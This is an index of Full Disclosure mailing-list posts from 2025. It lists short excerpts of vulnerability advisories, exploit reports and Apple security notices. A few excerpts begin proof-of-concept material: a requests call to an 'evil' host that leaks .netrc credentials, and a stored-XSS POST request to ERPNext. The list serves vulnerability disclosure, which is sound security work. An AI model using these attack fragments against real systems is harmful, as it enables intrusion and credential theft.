[FD] Defense in depth -- the Microsoft way (part 91): yet another 30 year old bug of the "Properties" shell extension

Hi @ll, this extends the previous post titled Defense in depth -- the Microsoft way (part 90): "Digital Signature" property sheet missing without "Read Extended Attributes" access permission , to document another facette of this 30 year old bug in t

[FD] Rtpengine: RTP Inject and RTP Bleed vulnerabilities despite proper configuration (CVSS v4.0 Score: 9.3 / Critical)

Rtpengine: RTP Inject and RTP Bleed vulnerabilities despite proper configuration (CVSS v4.0 Score: 9.3 / Critical) - CVSS v4.0 - Exploitability: High - Complexity: Low - Vulnerable system: Medium - Subsequent system: Medium - Exploitation: High - Security requirements: Hig

[FD] APPLE-SA-07-30-2025-1 Safari 18.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-30-2025-1 Safari 18.6 Safari 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124152. Apple maintains a Security Releases page at https://support.apple.com/100100

[FD] Defense in depth -- the Microsoft way (part 90): "Digital Signature" property sheet missing without "Read Extended Attributes" access permission

Hi @ll, about 35 years ago Microsoft began to implement their "New Technology File System" (NTFS) for their upcoming Windows NT operating system. NTFS supports the extended attributes of the HPFS file system which Microsoft and IBM had developed for their OS/2 operating system before. NTFS' initia

[FD] St. Pölten UAS 20250721-0 | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini

St. Pölten UAS 20250721-0 --- title| Multiple Vulnerabilities in REX100 product| Helmholz Industrial Router REX100 / mbNET.mini vulnerable version| < 2.3.3 fixed version| 2.3.3

[FD] APPLE-SA-07-29-2025-8 visionOS 2.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-8 visionOS 2.6 visionOS 2.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124154. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-07-29-2025-7 tvOS 18.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-7 tvOS 18.6 tvOS 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124153. Apple maintains a Security Releases page at https://support.apple.com/100100 whi

[FD] APPLE-SA-07-29-2025-6 watchOS 11.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-6 watchOS 11.6 watchOS 11.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124155. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-07-29-2025-5 macOS Ventura 13.7.7

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-5 macOS Ventura 13.7.7 macOS Ventura 13.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/124151. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-07-29-2025-4 macOS Sonoma 14.7.7

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-4 macOS Sonoma 14.7.7 macOS Sonoma 14.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/124150. Apple maintains a Security Releases page at https://support.

[FD] APPLE-SA-07-29-2025-3 macOS Sequoia 15.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-3 macOS Sequoia 15.6 macOS Sequoia 15.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124149. Apple maintains a Security Releases page at https://support.ap

[FD] APPLE-SA-07-29-2025-2 iPadOS 17.7.9

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-2 iPadOS 17.7.9 iPadOS 17.7.9 addresses the following issues. Information about the security content is also available at https://support.apple.com/124148. Apple maintains a Security Releases page at https://support.apple.com/10

[FD] APPLE-SA-07-29-2025-1 iOS 18.6 and iPadOS 18.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-07-29-2025-1 iOS 18.6 and iPadOS 18.6 iOS 18.6 and iPadOS 18.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/124147. Apple maintains a Security Releases page at https:

[FD] Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability

Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability [-] Software Link: https://invisioncommunity.com [-] Affected V

[FD] CVE‑2025‑52187 – Stored XSS in School Management System (PHP/MySQL)

Hello Full Disclosure community, I’m sharing details of a recently assigned CVE affecting a widely used open‑source School Management System (PHP/MySQL). CVE ID: CVE‑2025‑52187 Vulnerability Type: Stored Cross‑Site Scripting (XSS) Attack Vector: Remote

[FD] Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability

- Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting Vulnerability - [-] Software Link: https:/

Re: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers

The following snippet in the text is associated to the wrong CVE number: 2.2 Possibility of injecting JavaScript code into the name of the visiting network (XSS) - CVE-2025-26064 The correct CVE number for item 2.2 is CVE-2025-26065. On Sun, Jul 20, 2025 at 3:22 AM Gabriel Augusto Vaz de Lima via

[FD] Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0

# Exploit Title: Stored XSS "Edit General Info" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Edit General Info" Functionality #3: Steps to Reproduce 1. Login with adm

[FD] Stored XSS "Create Page" Functionality - seotoasterv2.5.0

# Exploit Title: Stored XSS "Create Page" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Create Page" Functionality #1: Steps to Reproduce 1. Login with admin and visit

[FD] Open Redirect "Login Page" Functionality - seotoasterv2.5.0

# Exploit Title: Open Redirect "Login Page" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Open Redirect "Login Page" Functionality #1: Steps to Reproduce Login to the application

[FD] Stored XSS "Edit Header" Functionality - seotoasterv2.5.0

# Exploit Title: Stored XSS "Edit Header" Functionality - seotoasterv2.5.0 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 2.5.0 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Edit Header" Functionality #1: Steps to Reproduce: Login as admin user and vis

[FD] [KIS-2025-04] SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability

-- SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Vulnerability -- [-] Software Link: https://www.sugarcrm.com [-] Affected Versions: All commercial versions b

[FD] AK-Nord USB-Server-LXL privilege escalation and code execution (CVE-2025-52361)

== Overview == TL;DR: Using the low-privilege "admin" user account via SSH on the IoT device "USB-Server-LXL" [1], it is possible to modify the script /etc/init.d/lighttpd which is executed by root upon restart, leading to arbitrary code execution with root privil

[FD] KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal

KL-001-2025-016: Xorux LPAR2RRD File Upload Directory Traversal Title: Xorux LPAR2RRD File Upload Directory Traversal Advisory ID: KL-001-2025-016 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-016.txt 1. Vulnerability Details Affected

[FD] KL-001-2025-015: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information

KL-001-2025-015: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information Title: Xorux LPAR2RRD Read Only User Log Download Exposing Sensitive Information Advisory ID: KL-001-2025-015 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001

[FD] KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service

KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service Title: Xorux LPAR2RRD Read Only User Denial of Service Advisory ID: KL-001-2025-014 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt 1. Vulnerability Details Affect

[FD] KL-001-2025-013: Xorux XorMon-NG Web Application Privilege Escalation to Administrator

KL-001-2025-013: Xorux XorMon-NG Web Application Privilege Escalation to Administrator Title: Xorux XorMon-NG Web Application Privilege Escalation to Administrator Advisory ID: KL-001-2025-013 Publication Date: 2025-07-28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-01

[FD] KL-001-2025-012: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information

KL-001-2025-012: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information Title: Xorux XorMon-NG Read Only User Export Device Configuration Exposing Sensitive Information Advisory ID: KL-001-2025-012 Publication Date: 2025-07-28 Publication URL: https://korelogi

[FD] Multiple vulnerabilities in the web management interface of Intelbras routers

=[Tempest Security Intelligence]== Multiple vulnerabilities in the web management interface of Intelbras routers Author: Gabriel Lima =[Table of Contents]== 1. Overview 2. Detailed description

[FD] Missing Critical Security Headers in OpenBlow

Advisory ID: OPENBLOW-2025-003 Title: Missing Critical Security Headers in OpenBlow Date: 2025-07-12 Vendor: OpenBlow (openblow.it) Severity: High CVSS v3.1 Base Score: 8.2 (High) Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N Summary: Multiple public deployments of the OpenBlow whistleblowing soft

[FD] SAP NetWeaver S/4HANA - ABAP Code Execution via Internal Function

nullFaktor Security Advisory < 20250719 > === Title: ABAP Code Execution via Internal Function Module WRITE_AND_CALL_DBPROG Vulnerability: Exposed Dangerous Functionality Product: SAP NetWeaver S

[FD] Tiki Wiki CMS Groupware <= 28.3 Two Server-Side Template Injection Vulnerabilities

-- Tiki Wiki CMS Groupware <= 28.3 Two Server-Side Template Injection Vulnerabilities -- [-] Software Link: https://tiki.org [-] Affec

[FD] KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery

KL-001-2025-011: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Server-Side Request Forgery Advisory ID: KL-001-2025-011 Publication Date: 2025-07-09 Publication URL: ht

[FD] KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation

KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Title: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Advisory ID: KL-001-2025-010 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001

[FD] KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution

KL-001-2025-009: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Remote Command Execution Advisory ID: KL-001-2025-009 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisori

[FD] KL-001-2025-008: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery

KL-001-2025-008: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery Title: Schneider Electric EcoStruxure IT Data Center Expert Root Password Discovery Advisory ID: KL-001-2025-008 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories

[FD] KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution

KL-001-2025-007: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Title: Schneider Electric EcoStruxure IT Data Center Expert Unauthenticated Remote Code Execution Advisory ID: KL-001-2025-007 Publication Date: 2025-07-09 Publication URL: https://korelo

[FD] KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection

KL-001-2025-006: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Title: Schneider Electric EcoStruxure IT Data Center Expert XML External Entities Injection Advisory ID: KL-001-2025-006 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Reso

[FD] eSIM security research (GSMA eUICC compromise and certificate theft)

Dear All, We broke security of Kigen eUICC card with GSMA consumer certificates installed into it. The eUICC card makes it possible to install the so called eSIM profiles into target chip. eSIM profiles are software representations of mobile subscriptions. For many years such mobile subscriptions

[FD] Directory Traversal "Site Title" - bluditv3.16.2

# Exploit Title: Directory Traversal "Site Title" - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Directory Traversal "Site Title" #1: Steps to Reproduce: 1. Login with admin account and "General"

[FD] XSS via SVG File Uploa - bluditv3.16.2

# Exploit Title: XSS via SVG File Upload - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ XSS via SVG File Upload #1: Steps to Reproduce: 1. Login with admin account and click on "General" > "Logo"

[FD] Stored XSS "Add New Content" Functionality - bluditv3.16.2

# Exploit Title: Stored XSS "Add New Content" Functionality - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Add New Content" Functionality #1: Steps to Reproduce: 1. Login with admin a

[FD] Session Fixation - bluditv3.16.2

# Exploit Title: Session Fixation - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Session Fixation #1: Steps to Reproduce: Visit the login page. Login with valid user and observe that the sessionI

[FD] Remote DoS in httpx 1.7.0 – Out-of-Bounds Read via Malformed Tag

Hey list, You can remotely crash httpx v1.7.0 (by ProjectDiscovery) by serving a malformed tag on your website. The bug is a classic out-of-bounds read in trimTitleTags() due to a missing bounds check when slicing the title string. It panics with: panic: runtime error: slice bounds out of ran

[FD] CVE-2025-32975 - Quest KACE SMA Authentication Bypass

Seralys Security Advisory | https://www.seralys.com/research == Title: Authentication Bypass Product: Quest KACE Systems Management Appliance (SMA) Affected:Confirmed on 14.1 (older versions likely affected) Fix

[FD] CVE-2025-32977 - Quest KACE Unauthenticated Backup Upload

Seralys Security Advisory | https://www.seralys.com/research == Title: Unauthenticated Backup Upload Product: Quest KACE Systems Management Appliance (SMA) Affected:Confirmed on 14.1 (older versions likely affec

[FD] RansomLord (NG v1.0) anti-ransomware exploit tool

First official NG versioned release with significant updates, fixes and new features https://github.com/malvuln/RansomLord/releases/tag/v1.0 RansomLord (NG) v1.0 Anti-Ransomware exploit tool. Proof-of-concept tool that automates the creation of PE files, used to exploit ransomware pre-encryption.

[FD] CVE-2025-32978 - Quest KACE SMA Unauthenticated License Replacement

Seralys Security Advisory | https://www.seralys.com/research == Title: Unauthenticated License Replacement Product: Quest KACE Systems Management Appliance (SMA) Affected:Confirmed on 14.1 (older versions likely

[FD] CVE-2025-32976 - Quest KACE SMA 2FA Bypass

Seralys Security Advisory | https://www.seralys.com/research == Title: 2FA Bypass Product: Quest KACE Systems Management Appliance (SMA) Affected:Confirmed on 14.1 (older versions likely affected) Fixed in:1

[FD] Disclosure Yealink Cloud vulnerabilities

Dear all, ---Abstract--- Yealink RPS contains several vulnerabilities that can lead to leaking of PII and/or MITM attacks. Some vulnerabilities are unpatched even after disclosure to the manufacturer. ---/Abstract--- We are Stefan Gloor and Jeroen Hermans. We are independent computer securit

[FD] SEC Consult SA-20250611-0 :: Undocumented Root Shell Access on SIMCom SIM7600G Modem

SEC Consult Vulnerability Lab Security Advisory < 20250611-0 > === title: Undocumented Root Shell Access product: SIMCom - SIM7600G Modem vulnerable version: Firmware Revision: LE20B03SIM7600M21-A

[FD] Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain → Secure Enclave Key Theft, Wormable RCE, Crypto Theft

Hello Full Disclosure, This is a strategic public disclosure of a zero-click iMessage exploit chain that was discovered live on iOS 18.2 and remained unpatched through iOS 18.4. It enabled Secure Enclave key theft, wormable remote code execution, and undetectable crypto wallet exfiltration. Des

[FD] Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

Hi @ll, user group policies are stored in DACL-protected registry keys [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] respectively [HKEY_CURRENT_USER\Software\Policies] and below, where only the SYSTEM account and members of the "Administrators" user group are granted write

[FD] CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project: CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0 --

[FD] ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

An authenticated attacker can inject JavaScript into the bio field of their user profile. When the profile is viewed by another user, the injected script executes. *Proof of Concept:* POST /api/method/frappe.desk.page.user_profile.user_profile.update_profile_info HTTP/2 Host: --host-- profile_in

[FD] ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

An authenticated user can inject malicious JavaScript into the user_image field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient sanitization, allowing stored script execution in the context of other authenticated users. *Pro

[FD] Local information disclosure in apport and systemd-coredump

rash_to_container( 510 options: argparse.Namespace, coredump_fd: int = 0, has_cap_sys_admin: bool = True 511 ) -> None: ... 521 proc_host_pid_fd = os.open( 522 f"/proc/{options.global_pid}", os.O_RDONLY | os.O_PATH | os.O_DIRECTORY 523 ) ... 531 sock_fd

[FD] Stored XSS via File Upload - adaptcmsv3.0.3

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS via File Upload #1: Steps to Reproduce: 1. Login with low privilege user and visit "Profile"

[FD] IDOR "Change Password" Functionality - adaptcmsv3.0.3

# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ IDOR "Change Password" Functionality #1: Steps to Reproduce: 1. Login as user with low privile

[FD] Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS "Send Message" Functionality #1: Steps to Reproduce: 1. Login as normal user and

[FD] Authenticated File Upload to RCE - adaptcmsv3.0.3

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 # Date: 06/2025 # Exploit Author: Andrey Stoykov # Version: 3.0.3 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE #1: Steps to Reproduce: 1. Login as admin user and visit "System"

[FD] Stored XSS in "Description" Functionality - cubecartv6.5.9

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9 # Date: 05/2025 # Exploit Author: Andrey Stoykov # Version: 6.5.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Stored XSS #1: Steps to Reproduce: 1. Visit "Account" > "Address Book" and choose "Edit"

[FD] Multiple Vulnerabilities in SAP GuiXT Scripting

Security Advisory Vulnerabilities reported to vendor: March 13, 2025 Vendor requested additional information: March 20, 2025 Additional information provided to vendor: March 22, 2025 Vendor confirmed the reported issues but rejected them: March 31, 2025 Additional information provided to vendor: M

[FD] CVE-2024-47081: Netrc credential leak in PSF requests library

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evi

[FD] Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

Hi, I am submitting an exploit for *CVE-2019-9978*, a remote code execution vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2). *Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2) *Date*: 2025-05-20 *Exploit Author*: Huseyin M

[FD] Youpot honeypot

Hi, I made a novel honeypot for worms called Youpot. Normally a honeypot will try to implement whatever service it thinks the attacker would like. For a high interaction or pure honeypot this is often impossible, because of the thousands of possibilities. Even a simple telnet server will have

[FD] SEC Consult SA-20250521-0 :: Multiple Vulnerabilities in eCharge Hardy Barth cPH2 and cPP2 charging stations

SEC Consult Vulnerability Lab Security Advisory < 20250521-0 > === title: Multiple Vulnerabilities product: eCharge Hardy Barth cPH2 and cPP2 charging stations vulnerable version: 2.2.0 fixed versi

[FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

 An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressi

[FD] SEC Consult SA-20250506-0 :: Honeywell MB Secure Authenticated Command Injection

SEC Consult Vulnerability Lab Security Advisory < 20250507-0 > === title: Authenticated Command Injection product: Honeywell MB-Secure vulnerable version: MB-Secure versions from V11.04 and prior to V12.5

[FD] Unauthenticated Blind SQL Injection | RSI queue management system - V 3.0 | CVE-2025-26086

[+] Credits: Shahnawaz Shaikh, Security Researcher at Cybergate Defense LLC [+] twitter.com/_striv3r_ [Vendor of Product] RSI Queue (https://www.rsiqueue.com/) [Vulnerability Type] Blind SQL Injection [Affected Component] The vulnerable component is the TaskID parameter in the get request. [CVE

[FD] CVE-2025-30072 Tiiwee X1 Alarm System - Authentication Bypass by Capture-replay

-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Advisory ID: SYSS-2025-006 Product: Tiiwee X1 Alarm System Manufacturer: Tiiwee B.V. Affected Version(s): TWX1HAKV2 Tested Version(s): TWX1HAKV2 Vulnerability Type:Authentication Bypa

[FD] SEC Consult SA-20250422-0:: Local Privilege Escalation via DLL Search Order Hijacking

SEC Consult Vulnerability Lab Security Advisory < 20250422-0 > === title: Local Privilege Escalation via DLL Search Order Hijacking product: Ivanti Endpoint Manager Security Scan (Vulscan) Self Update vu

[FD] SEC Consult SA-20250429-0 :: Multiple Vulnerabilities in HP Wolf Security Controller and more

SEC Consult Vulnerability Lab Security Advisory < publishing date 20250429-0 > Combined Security Advisory for Sure Access Enterprise and Sure Click Enterprise === title: Multiple Vulnerabilities product:

[FD] Session Invalidation in Economizzer Allows Unauthorized Access After Logout

A session management vulnerability exists in gugoan's Economizzer v.0.9-beta1. The application fails to properly invalidate user sessions upon logout or other session termination events. As a result, a valid session remains active and usable even after the user has attempted to log out. POST /we

[FD] Persistent Cross-Site Scripting in Economizzer Category Entry

A persistent cross-site scripting (XSS) vulnerability exists in gugoan's Economizzer v.0.9-beta1. The application fails to properly sanitize user-supplied input when creating a new category via the *category/create *endpoint. An attacker can inject malicious JavaScript payloads that are permanently

[FD] Persistent Cross-Site Scripting in Economizzer Cashbook Entry

A persistent cross-site scripting (XSS) vulnerability exists in gugoan's Economizzer v.0.9-beta1 The application fails to properly sanitize user-supplied input when creating a new cash book entry via the *cashbook/create* endpoint. An attacker can inject malicious JavaScript payloads that are perma

[FD] APPLE-SA-05-12-2025-9 Safari 18.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-9 Safari 18.5 Safari 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122719. Apple maintains a Security Releases page at https://support.apple.com/100100

[FD] APPLE-SA-05-12-2025-8 visionOS 2.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-8 visionOS 2.5 visionOS 2.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122721. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-05-12-2025-7 tvOS 18.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-7 tvOS 18.5 tvOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122720. Apple maintains a Security Releases page at https://support.apple.com/100100 whi

[FD] APPLE-SA-05-12-2025-6 watchOS 11.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-6 watchOS 11.5 watchOS 11.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122722. Apple maintains a Security Releases page at https://support.apple.com/1001

[FD] APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-5 macOS Ventura 13.7.6 macOS Ventura 13.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122718. Apple maintains a Security Releases page at https://suppor

[FD] APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-4 macOS Sonoma 14.7.6 macOS Sonoma 14.7.6 addresses the following issues. Information about the security content is also available at https://support.apple.com/122717. Apple maintains a Security Releases page at https://support.

[FD] APPLE-SA-05-12-2025-3 macOS Sequoia 15.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-3 macOS Sequoia 15.5 macOS Sequoia 15.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122716. Apple maintains a Security Releases page at https://support.ap

[FD] APPLE-SA-05-12-2025-2 iPadOS 17.7.7

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-2 iPadOS 17.7.7 iPadOS 17.7.7 addresses the following issues. Information about the security content is also available at https://support.apple.com/122405. Apple maintains a Security Releases page at https://support.apple.com/10

[FD] APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-05-12-2025-1 iOS 18.5 and iPadOS 18.5 iOS 18.5 and iPadOS 18.5 addresses the following issues. Information about the security content is also available at https://support.apple.com/122404. Apple maintains a Security Releases page at https:

[FD] [KIS-2025-02] Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability

--- Invision Community <= 5.0.6 (customCss) Remote Code Execution Vulnerability --- [-] Software Link: https://invisioncommunity.com [-] Affected Vers

[FD] secuvera-SA-2025-01: Privilege Escalation in Automic Automation Agent Unix

secuvera-SA-2025-01: Privilege Escalation Affected Products Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1 References secuvera-SA-2025-01 CVE not assigned yet CWE-426: Untrusted Search Path CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L Summary: An age

[FD] BeyondTrust PRA connection takeover - CVE-2025-0217

=== Details Vendor: BeyondTrust Product: Privileged Remote Access (PRA) Subject: PRA connection takeover CVE ID: CVE-2025-0217 CVSS: 7.8 (high) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Author: Paul Szabo Date: 2025-05-05

[FD] Microsoft Windows .XRM-MS File / NTLM Information Disclosure Spoofing

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt [+] x.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vuln

[FD] [IWCC 2025] CfP: 14th International Workshop on Cyber Crime - Ghent, Belgium, Aug 11-14, 2025

[APOLOGIES FOR CROSS-POSTING] CALL FOR PAPERS 14th International Workshop on Cyber Crime (IWCC 2025 - https://2025.ares-conference.eu/program/iwcc/) to be held in conjunction with the 20th International Conference on Availability, Reliability and Security (ARES 2025 - http://2025.ares-conference.e

[FD] Inedo ProGet Insecure Reflection and CSRF Vulnerabilities

Inedo ProGet 2024.22 and below are vulnerable to unauthenticated denial of service and information disclosure attacks (among other things) because the information system directly exposes the C# reflection used during the request-action mapping process and fails to properly protect certain pathwa

[FD] Microsoft ".library-ms" File / NTLM Information Disclosure (Resurrected 2025)

[-] Microsoft ".library-ms" File / NTLM Information Disclosure Spoofing (Resurrected 2025) / CVE-2025-24054 [+] John Page (aka hyp3rlinx) [+] x.com/hyp3rlinx [+] ISR: ApparitionSec Back in 2018, I reported a ".library-ms" File NTLM information disclosure vulnerability to MSRC and was told "it was

[FD] Ruby on Rails Cross-Site Request Forgery

Good morning. All current versions and all versions since the 2022/2023 "fix" to the Rails cross-site request forgery (CSRF) protections continue to be vulnerable to the same attacks as the 2022 implementation. Currently, Rails generates "authenticity tokens" and "csrf tokens" using a random "

[FD] HNS-2025-10 - HN Security Advisory - Local privilege escalation in Zyxel uOS

Hi, Please find attached a security advisory that describes some vulnerabilities we discovered in the Zyxel uOS Linux-based operating system. * Title: Local privilege escalation via Zyxel fermion-wrapper * Product: USG FLEX H Series * OS: Zyxel uOS V1.31 (and potentially earlier versions) * Autho

[FD] APPLE-SA-04-16-2025-4 visionOS 2.4.1

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-04-16-2025-4 visionOS 2.4.1 visionOS 2.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122402. Apple maintains a Security Releases page at https://support.apple.com/

[FD] APPLE-SA-04-16-2025-3 tvOS 18.4.1

-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-04-16-2025-3 tvOS 18.4.1 tvOS 18.4.1 addresses the following issues. Information about the security content is also available at https://support.apple.com/122401. Apple maintains a Security Releases page at https://support.apple.com/100100

